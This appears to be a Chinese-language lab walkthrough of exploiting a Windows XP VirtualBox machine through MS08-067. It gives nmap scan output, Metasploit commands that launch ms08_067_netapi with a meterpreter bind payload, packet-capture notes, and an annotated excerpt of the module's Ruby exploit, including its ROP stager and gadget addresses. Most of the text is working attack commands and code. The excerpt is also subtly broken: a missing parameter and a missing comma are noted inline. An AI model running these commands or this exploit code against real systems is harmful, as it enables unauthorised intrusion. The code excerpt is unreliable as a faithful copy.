$ nmap -A -O -sV -v 192.168.1.106
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
OS details: Microsoft Windows XP SP2 or SP3
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| nbstat: NetBIOS name: KALI-C3260A29CC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4a:d0:28 (Oracle VirtualBox virtual NIC)
| Names:
| KALI-C3260A29CC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| KALI-C3260A29CC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: kali-c3260a29cc
| NetBIOS computer name: KALI-C3260A29CC
| Workgroup: WORKGROUP
|_ System time: 2017-02-07T17:13:49+08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
msf 漏洞利用腳本 ms08_067_netapi
$ msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.1.106
> exploit
封包擷取 1
目標 windows smb 服務 port 445
封包擷取 2
Payload 彈回本地 port 4444
封包開頭MZ 代表傳送一個 Windows Payload 的 EXE
腳本簡單分析
漏洞利用
def exploit
...
#
# Windows XP SP2/SP3 ROP Stager targets
#
elsif mytarget['UseROP']
rop = generate_rop(mytarget['UseROP'])
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode(pad) +
# ROP Stager
rop +
# Padding (skipped)
Rex::Text.rand_text_alpha(2) +
# NULL termination
"\x00" * 2
....
handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
dcerpc_bind(handle)
....
提權
def generate_rop
  # Builds the HeapCreate-based ROP stager used by the module's ROP targets
  # (the exploit method calls this as generate_rop(mytarget['UseROP']) and
  # splices the result into the path buffer).
  #
  # NOTE(review): this definition takes no parameter, but `version` is read
  # below and the caller passes one argument, so the signature was presumably
  # `def generate_rop(version)` and lost its parameter when the listing was
  # pasted. As written here the call would raise ArgumentError — confirm
  # against the upstream module before relying on this excerpt.
  #
  # The chain depends on ACGENRAL.DLL being loaded at a fixed base
  # (module_base is simply added to each RVA); that assumption is what ties
  # the stager to specific XP builds.
  #
  # @param version [String] ACGENRAL.DLL file version selecting the gadget RVA
  #   table; only '5.1.2600.5512' is present in this listing
  # @return [String] the chain packed as little-endian 32-bit values, in order
  # fail_with(Failure::BadConfig, ...) aborts when a named gadget is missing
  # from the selected table.

  # NOP slot at the start of each hand-written gadget; the commented-out
  # alternative (int3) is a debugging aid for single-stepping the stager.
  free_byte = "\x90"
  # free_byte = "\xcc"

  # create a few small gadgets (raw x86 bytes; they are written into the
  # heap block obtained below and executed from there)
  # <free byte>; pop edx; pop ecx; ret
  gadget1 = free_byte + "\x5a\x59\xc3"
  # mov edi, eax; add edi,0xc; push 0x7f; pop ecx; rep movsd
  # (0x6a 0x7f is push 0x7f, matching "get 0x7f in ecx" below — the original
  # comment said push 0x40. 0xf2 0xa5 decodes as repne movsd, which for a
  # string move behaves the same as rep movsd.)
  gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
  # <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
  gadget3 = "\xcc" + free_byte + "\xeb\x5a"
  # gadget2:
  # get eax into edi
  # adjust edi
  # get 0x7f in ecx
  # copy the data
  # jmp to it
  #
  # gadget2 is exactly 12 bytes, so this yields three DWORDs (dws[0..2])
  # that are placed into the chain below.
  dws = gadget2.unpack('V*')
  ##
  # Create the ROP stager, pfew.. Props to corelanc0d3r!
  # This was no easy task due to space limitations :-/
  # -jduck
  ##
  # module_name is assigned but never read in this method (kept for
  # readability / parity with the upstream listing).
  module_name = 'ACGENRAL.DLL'
  module_base = 0x6f880000
  # Per-version tables: gadget description => RVA. The String entries in
  # `rop` below are looked up here and turned into absolute addresses.
  rvasets = {}
  # XP SP3
  rvasets['5.1.2600.5512'] = {
    # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
    'call_HeapCreate' => 0x21286,
    'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
    # +6 lands on the last immediate byte (0x59 = pop ecx) of the mov above,
    # followed by its ret — an overlapping-instruction gadget.
    'pop ecx / ret' => 0x2e796 + 6,
    'mov [eax], ecx / ret' => 0xd296,
    'jmp eax' => 0x19c6f,
    'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
    # suffix of the gadget above (skips the first two 3-byte movs)
    'mov [eax+0x10], ecx / ret' => 0x10a56 + 6
    'add eax, 8 / ret' => 0x29c64
  }
  # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
  # NOTE(review): this header names build 2180 while only the 5512 table
  # exists above; a second table may have been elided from the listing.
  # Entries: Strings are meta gadgets resolved via rvasets, Integers are
  # literal stack values (arguments / pops).
  rop = [
    # prime ebp (adjustment distance)
    0x00018000,
    # get some RWX memory via HeapCreate
    'call_HeapCreate',
    0x01040110, # flOptions (gets & with 0x40005)
    0x01010101,
    0x01010101,
    # adjust the returned pointer
    'add eax, ebp / mov ecx, 0x59ffffa8 / ret',
    # setup gadget1
    'pop ecx / ret',
    gadget1.unpack('V').first,
    'mov [eax], ecx / ret',
    # execute gadget1
    'jmp eax',
    # setup gadget2 (via gadget1)
    dws[0],
    dws[1],
    'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',
    # setup part3 of gadget2
    'pop ecx / ret',
    dws[2],
    'mov [eax+0x10], ecx / ret',
    # execute gadget2
    'add eax, 8 / ret',
    'jmp eax',
    # gadget3 gets executed after gadget2 (luckily)
    gadget3.unpack('V').first
  ]
  # convert the meta rop into concrete bytes
  # NOTE(review): rvasets[version] is nil for any version not in the table,
  # so the rvas[e] lookup in the block raises NoMethodError instead of a
  # clean failure; a fail_with(Failure::BadConfig, ...) guard here would
  # report an unsupported version explicitly.
  rvas = rvasets[version]
  rop.map! { |e|
    if e.kind_of? String
      # Meta-replace (RVA)
      fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
      module_base + rvas[e]
    elsif e == :unused
      # Randomize
      # (no :unused entries appear in the array above, so this branch is
      # not reached by this chain)
      rand_text(4).unpack('V').first
    else
      # Literal
      e
    end
  }
  # pack every element as a 32-bit little-endian value
  ret = rop.pack('V*')
  # check badchars?
  # idx = Rex::Text.badchar_index(ret, payload_badchars)
  # NOTE: no bad-character check is applied to the packed chain; the line
  # above is left disabled.
  ret
end